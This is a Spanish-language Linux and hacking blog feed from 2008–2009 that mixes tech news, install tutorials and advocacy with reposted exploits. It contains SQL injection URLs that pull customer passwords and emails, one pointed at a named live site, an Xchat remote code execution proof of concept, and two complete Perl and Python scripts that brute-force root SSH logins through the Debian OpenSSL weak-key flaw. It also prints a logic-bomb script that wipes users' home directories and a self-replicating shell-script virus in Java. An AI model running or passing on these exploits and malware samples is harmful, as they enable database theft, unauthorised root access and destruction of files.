The zerial killer --> de Gnu/Linux y mas....

Spam y los botnets alcanzan máximos históricos

noreply@blogger.com (zerial killer) — Mon, 03 Aug 2009 17:55:00 +0000

El volumen de spam ha aumentado un 141% desde marzo, lo que significa el mayor aumento hasta ahora, según el Informe de amenazas del segundo trimestre realizado por McAfee. El documento destaca la dramática expansión de botnets (zombis) y amenazas de malware Auto-Run (de ejecución automática).

Este trimestre hay más de 14 millones de nuevos ordenadores zombis, un 16% más que en el trimestre anterior. Este informe ha confirmado la predicción que McAfee realizó en el informe del primer trimestre sobre el crecimiento de los botnets, afirmando que el spam alcanzaría nuevos límites, superando su propio récord de octubre de 2008, antes del cierre de McColo.

Los investigadores de McAfee han observado que el malware Auto –Run ha infectado más de 27 millones de archivos en un período de 30 días. Este tipo de malware aprovecha las cualidades Auto-Run de Windows, no necesita que el usuario lo active y suele propagarse a través de USB y dispositivos de almacenamiento. El ratio de detección supera incluso al de Conficker por un 400%, haciendo del malware basado en Auto-Run el más detectado a nivel mundial.

“El salto en la actividad de botnets y spam que hemos presenciado en los últimos tres meses es alarmante, y las amenazas de malware Auto-Run continúan creciendo", afirma Mike Gallagher, Vicepresidente Senior y Director de la Oficina de Tecnología de los Laboratorios McAfee Avert. “La expansión de estas infecciones es un grave recordatorio del daño que pueden sufrir los ordenadores desprotegidos, sean domésticos o empresariales."

Como el número de botnets continúa creciendo, los creadores de malware han empezado a ofrecer software malicioso como servicio a quienes controlan ordenadores zombis. Mediante intercambio o venta de recursos, los cibercriminales distribuyen instantáneamente nuevo malware a un público más amplio. Programas como Zeus – una herramienta de creación de troyanos ladrones de contraseñas de uso sencillo – facilitan la creación y gestión de troyanos.

Se inicia la distribución de Windows 7 entre fabricantes de PC

noreply@blogger.com (zerial killer) — Sun, 26 Jul 2009 18:20:00 +0000

La versión final de Windows 7 tiene la denominación Build 7600 informa Brandon LeBlanc, desarrollador de Microsoft, en el blog de Windows Team.
Por su parte, Oliver Rist, director técnico del producto Windows Server, se refiere a Windows Server 2008 R2 en el blog de la División Windows Server de Microsoft.

Las versiones de evaluación de Windows Server 2008 R2 estarán disponibles a partir de la primera quincena de agosto. La versión completa del software para servidores será distribuida entre abonados a Software Assurance durante la segunda quincena de agosto.

Rist informa además que los clientes con Windows Server 2008 no necesitarán adquirir nuevas licencias de tipo Client Acces Licenses (CALs) para actualizar a Windows Server 2008 R2.

Campaña publicitaria de Microsoft causa indignación en Apple

noreply@blogger.com (zerial killer) — Mon, 20 Jul 2009 18:33:00 +0000

Normalmente, Apple intenta "hacerse la graciosa" a costa de Microsoft mediante su campaña publicitaria Get a Mac. Sin embargo, todo indica que la propia Apple es
incapaz de probar su propia medicina.

Tal es la conclusión de Microsoft después de conocer la
reacción de Apple frente a su campaña publicitaria "Laptop
Hunters".

En los comerciales de la serie se observa a potenciales
compradores interesados en un PC portátil bueno y barato.
Como podría esperarse, el resultado no es que decidan
comprar una Macintosh. En el comercial se presenta una
Mac, con la conclusión de que es demasiado costosa.

Esta situación activó al departamento jurídico de Apple, que exigió a Microsoft cancelar su campaña.

En el comercial se entrega a los potenciales compradores
1.000 dólares con los que comprar un nuevo laptop. Cuando
llega el momento de ver una Mac, la respuesta es que es
demasiado costosa. Sin embargo, el departamento jurídico
de Apple indica que Microsoft debió haber sabido que Apple
acababa de aplicar una ligera rebaja en sus precios, de
forma que la Macintosh más económica podía ser adquirida
por 999 dólares.

La reacción de Apple fue comentada en la conferencia de
partners de Microsoft, realizada en Nueva Orleáns la semana pasada, donde el vicepresidente de Microsoft, Kevin Turner, indicó que la única reacción que generaría es incrementar la visibilidad de la campaña, en ningún caso reducirla.

En la misma conferencia, Turner anunció que Microsoft
lanzaría tiendas propias al igual que Apple. El ejecutivo
recalcó que las tiendas serían colocadas en las cercanías de los comercios de Apple.

Microsoft: "Chrome OS es un comentario en un blog"

noreply@blogger.com (zerial killer) — Fri, 17 Jul 2009 05:46:00 +0000

Microsoft continúa su embestida contra Google, señalando que no siente incomodidad alguna frente al futuro sistema operativo Chrome.

Diario Ti: Microsoft expresa indiferencia ante los planes de Google de lanzar en 2010 su sistema operativo basado en código abierto. "Por ahora, Chrome es un simple comentario en un blog", comenta Bill Veghte, portavoz de Microsoft, a la agencia de noticias DPA, haciendo referencia al blog oficial de Google, donde Chrome OS fue anunciado la semana pasada.

El sistema operativo basado en Linux estará disponible para netbooks durante el segundo semestre de 2010.

Microsoft fundamenta su observación señalando que pasó mucho tiempo antes que Google lanzara definitivamente su paquete de aplicaciones ofimáticas en línea, que fueron consideradas como una alternativa a Office. En este contexto, cabe señalar que la propia Microsoft prepara versiones en línea de su paquete Office.

Esta semana, Microsoft organiza una conferencia a gran escala para partners en Nueva Orleans. El evento contará con la asistencia de 9.000 socios comerciales de Microsoft, y se espera que la atención se concentre en Windows 7. El interés primordial de Microsoft es asegurar que el "ecosistema" necesario funcione adecuadamente, es decir, que aplicaciones y componentes de hardware y software sean compatibles con la nueva plataforma.

"Este ecosistema está listo gracias al apoyo que nos brindan nuestros partners", comentó Veghte.

Según cifras de la propia Microsoft, 16.000 partners desarrollan software específicamente para la plataforma Windows 7.

NOS MUDAMOS!!!!!

noreply@blogger.com (zerial killer) — Tue, 08 Jul 2008 01:52:00 +0000

Hola a todos me he cambiado para www.zerialkiller.h4ck3rx.org

Nos vemos por alla XD .

Nagios en debian lenny

noreply@blogger.com (zerial killer) — Sat, 05 Jul 2008 00:06:00 +0000

Nagios es un sistema de código abierto de monitorización de redes, máquinas, servicios, sistemas, filesystems... .Es muy flexible ya que permite definir distintos tipos de alertas en función de la disponibilidad de los objetos monitorizados.

En este mi-ni tuto instalaremos la ultima versión de nagios, Versión 3.0.3. Para poder hacer funcionar nagios necesitamos tener instalado apache, en mi caso sera apache2 (yo lo tengo con soporte a php y a mysql pero creo que no es necesario tener eso solo con el apache es mas que suficiente) .

Si no tienes apache basta con teclear los siguiente.

#apt-get install apache2

ahora necesitamos el entorno de compilacion.

#apt-get install build-essential

Necesitaremos las siguientes librerías para la compilación de nagios

#apt-get install libjpeg62 libjpeg62-dev libpng12-0 libpng12-dev

Tambien necesitaremos las librerías gd2.

TODO LO QUE DESCARGEMOS LO GUARDAREMOS EN /tmp .

#cd /tmp
#wget -c http://www.libgd.org/releases/gd-2.0.35.tar.gz ---> descargamos gd2
#tar xzf gd-2.0.35.tar.gz ---> descomprimimos gd2
#cd gd-2.0.35 ---> accedemos al directorio de gd2

ahora el proceso de configuracion y compilacion.
#./configure
#make
#make install

ahora creamos los usuarios y grupos necesarios.

#useradd nagios ---> creamos el usuario nagios
#passwd nagios ---> password para nagios
#groupadd nagios ---> añadimos el grupo
#groupadd nagcmd ---> otro mas
#usermod -G nagios nagios
#usermod -G nagios tu_usuario
#usermod -G nagcmd nagios
#usermod -G nagcmd www-data

Ya tenemos los usuarios para Nagios, para el Apache y el nuestro propio para poder editar los ficheros de configuración.
Ahora a compilar y configurar nagios.

Descargamos nagios y sus Plugins de su pagina oficial y los guardamos en /tmp
Nagios ---> www.nagios.org

o tmb de sourceforge aquí les dejo los enlaces directos de la vercion 3.0.3 de nagios y de sus plugins.

Nagios 3.0.3

PLUGINS

PLUGINS

ahora bien accedemos al directorio donde las descargamos

#cd /tmp --> directorio en donde descargue nagios y plugins
#tar xzf nagios-3.0.3.tar.gz ---> descomprimimos nagios
# tar xzf nagios-plugins-1.4.12.tar.gz ---> descomprimimos los plugins

una ves descomprimidos los plugins y nagios pasaremos ala parte de compilación, primero entramos al directorio de nagios.

#cd nagios-3.0.3
#./configure --with-command-group=nagcmd
#make all
#make install
#make install-init
#make install-config
#make install-commandmode
#make install-webconf

ahora pasaremos al directorio de los plugins para su configuración.

#cd /tmp/nagios-plugins-1.4.12

#./configure --with-nagios-user=nagios --with-nagios-group=nagios
#make
#make install

ahora toca crear una contraseña para el usuario nagiosadmin y reiniciar el Apache.

#htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin
#cd /etc/init.d/
#./apache2 restart

Arrancamos el Nagios.

#./nagios start

ahora abrimos nuestro navegador y tecleamos http://localhost/nagios/
deberá mostrarnos una ventana de login para el usuario de nagios y su respectiva contraseña, después de teclear el user y el pass correctamente accederemos a nagios.

Podemos crear un enlace para el arranque automático

#ln -s /etc/init.d/nagios /etc/rcS.d/S99nagios

aki una pantalla del buen Nagios.

10 razones de que Windows Vista es un buen sistema operativo

noreply@blogger.com (zerial killer) — Wed, 02 Jul 2008 18:01:00 +0000

WTF que PTM es esto °_° ¬¬ NO MAMEN .

Pondre el articulo tal y como lo encontre.

El sistema operativo Windows Vista ha recibido algunas críticas desde su lanzamiento hace más de un año. ¿Pero es realmente un sistema que "deja mucho que desear"?. El sitio Gizmodo presenta 10 razones que sugieren lo contrario.

Diario Ti: Con el fin de contrarrestar las opiniones en el sentido que Windows Vista sería un sistema operativo inconcluso y deficiente, el sitio Gizmodo ha publicado un análisis, con una lista de las 10 razones que convierten a Windows Vista en una buena opción.

1. Windows Vista es más seguro que Windows XP.
2. El interfaz de Windows Vista es mucho más atractivo que todas las versiones anteriores de Windows.
3. Windows Vista tiene una óptima capacidad de ejecución de juegos, muy similar a Windows XP.
4. El Media Center de Vista es excelente para la grabación de vídeo.
5. La función de suspensión de Windows Vista funciona “de maravillas".
6. La función User Account Control es altamente beneficiosa para “numerosos" usuarios.
7. El soporte para conectores es óptimo en Windows Vsta.
8. No hay más bugs (errores de código) en Windows Vista que en Windows XP.
9. Al contar con suficiente RAM, Windows Vista no es lento.
10. La función de búsqueda en el disco duro es óptima.

En todo caso, el autor del artículo no se muestra incondicionalmente positivo frente a Windows Vista. Hay varios puntos que le gustaría fuesen distintos. Por ejemplo, algunas conocidas funciones de Windows XP han sido cambiadas de lugar, lo que prolonga innecesariamente el tiempo de adaptación al software. Otro elemento que le causa molestia es la configuración de redes, que considera innecesariamente demorosa.

La argumentación completa puede ser vista en el sitio de Gizmodo (ver enlace).

Fuente : DiarioTI

JAAJJAAJ posiblemente tengan razon son 10 razones por las que guindous vista es "bueno", pero yo a gnu/linux le encuentro facil mas de 50 =)

MEME: Blogs

noreply@blogger.com (zerial killer) — Wed, 02 Jul 2008 00:29:00 +0000

Este es un Tipo de “meme” que vi en un sitio de por hay que trata sobre los blogs.

5 amigos cuyos blogs sin duda disfrutaría leer

1-http://gndx.org/
2-http://movimientolibre
3-http://fivenix.blogspot.com/
4-http://www.antoniomtz.org/
5-http://www.riveonline.com/

5 blogs que leería con placer morboso Y/O ociosos

1-http://www.socwall.com/
2-http://www.totallygeek.com/vscdb/index.php
3-http://linuxman.blogsome.com/
4-http://www.gnome-look.org/
5-http://art.gnome.org/

5 blogs que nunca leería

1-Uno sobre Lopez obrador
2-Uno sobre Porno Infantil
3-Uno sobre Putos -->Como el hiram y sus metroflogs
4-Uno sobre pokemon --> JAJA
5-Uno sobre Guindows --> JOJOJO

5 blogs recomendables (pues mas que nada son mis webs favoritas )

1-http://www.milw0rm.com/
2-http://packetstormsecurity.org/
3-http://www.remote-exploit.org/
4-http://www.securityfocus.com/
5-http://www.metasploit.com/

este meme se lo dejo a: GNDX Jmorales PAkO V. (cerillo) Antonio Martinez Rive bucio y a quien lo quiera contestar.

Remote SQL injection

noreply@blogger.com (zerial killer) — Mon, 30 Jun 2008 06:14:00 +0000

## AUTHOR : JuDge

## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com

## Script WebSite:http://www.eshop100.co.uk

##Dork::)

##DescRipTiON: pull customers info from database

##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################

video en YouTube, donde invita a descargar ilegalmente música

noreply@blogger.com (zerial killer) — Sat, 28 Jun 2008 17:48:00 +0000

Kid Rock ha publicado un video en YouTube, donde invita a descargar ilegalmente música - o en sus propias palabras, a robar música.
Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".

aqui al link: KID ROCK --> roba todo lo que puedas

Una Guia Linuxera, Para un Windolero

noreply@blogger.com (zerial killer) — Fri, 27 Jun 2008 16:19:00 +0000

Hola que tal, navegando ayer por el foro de elhacker me encontré esta guía para los novatos o como el titulo lo dice para un wuindulero =) bueno e aquí el link

Una Guia Linuxera, Para un Windolero

Como Instalar Back|Track 3

noreply@blogger.com (zerial killer) — Mon, 23 Jun 2008 07:12:00 +0000

Primero que nada tienes que tener lla echa una particion. Con 4 GB es mas que suficiente. Corremos el live cd de bactrac3 y abrimos una shell y comenzamos

bt~#mkdir /mnt/backtrack3 ---> creamos una carmeta dentro /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ --> montamos la particion donde queremos instalar /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ ---> creamos otro directorio
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---> instalamos tardara unos minutos

####----> despues de que termine con la instalacion terminamos con esto. -----------####

bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/

Para agregarlo al grub en mi cas solo edite el archivo menu.lst de mi debian.

bt ~ # fdisk -l

Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux

Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS

como podran ver fue en la /dev/sda10 donde instale el back|track3
entonses:

Entre en el archivo menu.lst de debian y lo edite

#nano /boot/grub/menu.lst

title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro

con eso fue mas que suficiente para tener back|track3 en mi HD.

aqui el link para descargar BACK|TRACK3

Instalar emesene

noreply@blogger.com (zerial killer) — Thu, 19 Jun 2008 01:00:00 +0000

emsn es un cliente de mensageria similar al msn. la verdad en lo personal aun prefiero pidgin pero pues siempre hay mas altertativas que probar.

Primero editamos nuestro sources.list

#pico /etc/apt/sources.list

Y agregamos los repos.

deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./

haora.

#apt-get update

y haora instalamos.

#apt-get install emesene

Y listo.

Xchat <= 2.8.7b Remote Code Execution

noreply@blogger.com (zerial killer) — Fri, 13 Jun 2008 17:11:00 +0000

##################################################################################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don't use any % or ../../../ as the others related bugs, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.

html
head title Welcome to my personal website /title /head
body
script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script
/body
/html

###http://www.milw0rm.com/#####

P2P =)

noreply@blogger.com (zerial killer) — Wed, 11 Jun 2008 05:10:00 +0000

Exploit SSH ---> OpenSSL

noreply@blogger.com (zerial killer) — Mon, 02 Jun 2008 20:42:00 +0000

dandome unas visitas por milworm encontre :

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit

the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)

4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de

# milw0rm.com [2008-05-15]

Y TAMBIEN

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)

#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
# http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################

import Queue
import os
import string
import time
from threading import Thread
import sys

#This class only has a boolean, which will be True if some thread find the key
class End():
def __init__(self):
self.end = False

def Finish(self):
self.end = True

def GetEnd(self):
return self.end

#This is the thread class
class Connection(Thread):
def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
Thread.__init__(self)
self.QueueDir = QueueDir
self.TheEnd = TheEnd
self.dir = dir
self.host = host
self.user = user
self.port = port

def run(self):
while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
key = self.QueueDir.get()

cmd = 'ssh -l ' + self.user
cmd = cmd + ' -p ' + self.port
cmd = cmd + ' -o PasswordAuthentication=no'
cmd = cmd + ' -i ' + self.dir + '/' + key
cmd = cmd + ' ' + self.host + ' exit; echo $?'

pin,pout,perr = os.popen3(cmd, 'r')
pin.close()

#To debug descoment the next line. This will show the errors reported by ssh
#print perr.read()

if pout.read().lstrip().rstrip() == '0':
self.TheEnd.Finish()
print ''
print 'Key Found in file: '+ key
print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
print ''

print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'

if len(sys.argv) < 4:
print './exploit.py [[port] [threads]]'
print ' : Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' : The victim host'
print ' : The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'

sys.exit(1)

dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]

if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4

else:
port=sys.argv[4]
threads = sys.argv[5]

ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()

for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])

initsize = QueueDir.qsize()
tested = 0

for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,port).start()

while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
time.sleep(5)
actsize = QueueDir.qsize()
speed = (initsize - tested - actsize)/5
tested = initsize - actsize

print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)

# milw0rm.com [2008-06-01]

Metagoofil

noreply@blogger.com (zerial killer) — Sat, 31 May 2008 21:08:00 +0000

Metagoofil es una Herramienta para obtener información de documentos públicos. Metagoofil nos ayuda a obtener una lista de usuarios, para poder realizar ataques de fuerza bruta sobre los servicios disponibles (FTP, VPN, Aplicaciones WEB, POP3).

Metagoofil es una herramienta que se encarga de extraer Meta-Data (Datos sobre los Datos), de ciertos ficheros accesibles en los webs del "objetivo".

Si Quieren saber como funciona cheken la web de Metagoofil

Bombas lógicas

noreply@blogger.com (zerial killer) — Wed, 28 May 2008 01:38:00 +0000

Las bombas lógicas son en cierta forma similares a los troyanos: se trata de código insertado en programas que parecen realizar cierta acción útil. Pero mientras que un troyano se ejecuta cada vez que se ejecuta el programa que lo contiene, una bomba lógica sólo se activa bajo ciertas condiciones, como una determinada fecha, la existencia de un fichero con un nombre dado, o el alcance de cierto número de ejecuciones del programa que contiene la bomba; así, una bomba lógica puede permanecer inactiva en el sistema durante mucho tiempo sin activarse y por tanto sin que nadie note un funcionamiento anómalo hasta que el daño producido por la bomba ya está hecho. Por ejemplo, imaginemos la misma situación que antes veíamos para el troyano: alguien con el suficiente privilegio renombra a vi como vi.old, y en el lugar del editor sitúa el siguiente código:

#!/bin/sh
if [ `date +%a` = "Sun" ];
then
rm -rf $HOME
else
vi.old $1
fi

Este cambio en el sistema puede permanecer durante años sin que se produzca un funcionamiento anómalo, siempre y cuando nadie edite ficheros un domingo; pero en el momento en que un usuario decida trabajar este día, la bomba lógica se va a activar y el directorio de este usuario será borrado.

Applets hostiles

noreply@blogger.com (zerial killer) — Wed, 28 May 2008 01:24:00 +0000

En los últimos años, con la proliferación de la web, Java y Javascript, una nueva forma de malware se ha hecho popular. estos instentan monopolizar o explotar los recursos del sistema de una forma inapropiada, esto incluye desde ataques clásicos como negaciones de servicio o ejecución remota de programas en la máquina cliente hasta amenazas mucho más elaboradas, como difusión de virus, ruptura lógica de cortafuegos o utilización de recursos remotos para grandes cálculos científicos.

Como ejemplo de applet hostil - aunque este en concreto no es muy peligroso - tenemos el siguiente código, obra de Mark D. LaDue (1996):

zkk:~/Security# cat Homer.java
import java.io.*;

class Homer {
public static void main (String[] argv) {
try {
String userHomer = System.getProperty("user.home");
String target = "$HOME";
FileOutputStream outer = new
FileOutputStream(userHome + "/.homer.sh");
String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" +
"echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" +
"for file in `find " + target + " -type f -print`" + "\n" + "do" +
"\n" + " case \"`sed 1q $file`\" in" + "\n" +
" \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" +
" || sed -n '/#-_/,$p' $0 >> $file" + "\n" +
" esac" + "\n" + "done" + "\n" +
"2>/dev/null";
byte[] buffer = new byte[homer.length()];
homer.getBytes(0, homer.length(), buffer, 0);
outer.write(buffer);
outer.close();
Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " +
userHome + "/.homer.sh");
Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +
"/.homer.sh");
} catch (IOException ioe) {}
}
}
zkk:~/Security#

Este programa infecta los sistemas Unix con un virus que contamina ficheros shellscript; antes de hacerlo muestra el mensaje `Java is safe, and UNIX viruses do not exist', para después localizar todos los ficheros shell en el directorio $HOME, comprobar cuáles están infectados, e infectar los que no lo están.

Llegaron los discos de ubuntu =)

noreply@blogger.com (zerial killer) — Wed, 21 May 2008 19:31:00 +0000

Hoy me han llegado los discos de GNU/LINUX ubuntu para 64 y 32 bits, yo no utilizo esta distribución pero muchas personas que conozco si, adames de que las regalo para las personas que se van iniciando en esto que es el mundo de GNU/LINUX.

Todas las personas que quieran un disco solo hagan meló saber con gusto se las daré.

Mas de 25 razones de peso para migrar a GNU/Linux

noreply@blogger.com (zerial killer) — Tue, 20 May 2008 23:28:00 +0000

1 - Debido a que está licenciado bajo licencia GPL, GNU/Linux (así como todo el software libre) está disponible sin ningún coste. Puede ser descargado de Internet de forma gratuita, y puede ser adquirido en formato CD o DVD con un coste muy trivial. Una copia puede ser utilizada en tantos ordenadores como queramos sin restricciones. Si comparamos con Microsoft Windows, solo el sistema operativo nos costará por lo menos 100 € por ordenador.

2 - Debido a que es software libre, GNU/Linux también es gratuito en el sentido de que cualquiera está autorizado a modificar, incluso su código fuente, de cualquier forma deseada. Si las versiones modificadas no son re-distribuidas, los cambios pueden mantenerse en secreto. Esto también choca bastante con Microsoft Windows, ya que las modificaciones no están permitidas. El código fuente es la versión original de un programa tal y como lo haya escrito un programador usando un lenguaje de programación y antes de ser compilado de forma que sus instrucciones puedan ser entendidas directamente por un ordenador. Por lo tanto, es necesario tener el código fuente con el fin de poder realizar cambios en un determinado programa. Esta capacidad de experimentar con el código fuente, y hacerlo sin necesidad de dar a conocer las modificaciones a terceros ha sido muy importante para un gran numero de organizaciones.

3 - GNU/Linux cuenta con un soporte de alta calidad disponible de forma gratuita a través de Internet, en grupos de noticias y foros. Algunas personas afirman que este soporte es al menos tan bueno como en el software privativo, que además funciona, evidentemente, pagando. GNU/Linux puede adquirirse si se desea de forma comercial. Existen empresas que basan su negocio del software libre en negocio de servicios. Dan soporte de instalación de aplicaciones, parches para hacer frente a nuevas amenazas de seguridad y parches para arreglar bugs descubiertos recientemente. En GNU/Linux estos 2 últimos son relativamente infrecuentes...

4 - Hay muy pocas posibilidades de que el soporte técnico para algún sistema GNU/Linux se elimine porque el software haya quedado obsoleto o por cualquier otro motivo. Esto se debe a que el código fuente estará siempre disponible para cualquier persona que lo desee, incluidas aquellas personas que prestan dicho soporte de forma gratuita en Internet y también para aquellas empresas que basan su negocio en los servicios. Por el contrario Microsoft Windows, y otros programas privativos cuyo código fuente es mantenido en secreto, la obtención de soporte técnico se complica si la compañía que lo vende decide retirar el software con el fin de tratar de obligar al usuario a pagar por la nueva versión, por ejemplo.

5 - No existe ningún temor a que las aplicaciones se queden obsoletas con GNU/Linux. Esto se debe a que la arquitectura UNIX en la que se basan ha sido exhaustivamente probada y refinada durante más de 35 años y ha demostrado ser extremadamente eficaz, robusta y segura. Las mejoras se realizan a un ritmo rápido, pero las nuevas versiones siguen siendo compatibles con la arquitectura UNIX subyacente.

6 - No hay actualizaciones obligatorias para los usuarios de GNU/Linux. Esto se debe a que las versiones antiguas siguen siendo soportadas (por ejemplo, con el desarrollo de nuevos parches de seguridad y controladores de dispositivo) y porque las nuevas versiones, si así lo desean, están disponibles de forma gratuita y suelen ser compatibles con versiones anteriores. Los desarrolladores de software propietario, sin embargo, tienen fuertes incentivos financieros para planificar el que una determinada versión quede obsoleta. Su objetivo será inducir a los usuarios de versiones anteriores a gastar dinero para comprar o actualizar a las nuevas versiones.

7 - En caso de que un usuario decida actualizar a una versión más reciente de GNU/Linux, no hay derechos de licencia de software u otros gastos si el usuario selecciona una distribución libre. Por otra parte, la formación, modificaciones, adquisición de hardware y otros costos relacionados con una actualización a una nueva versión son también relativamente bajos debido a la compatibilidad con versiones anteriores.

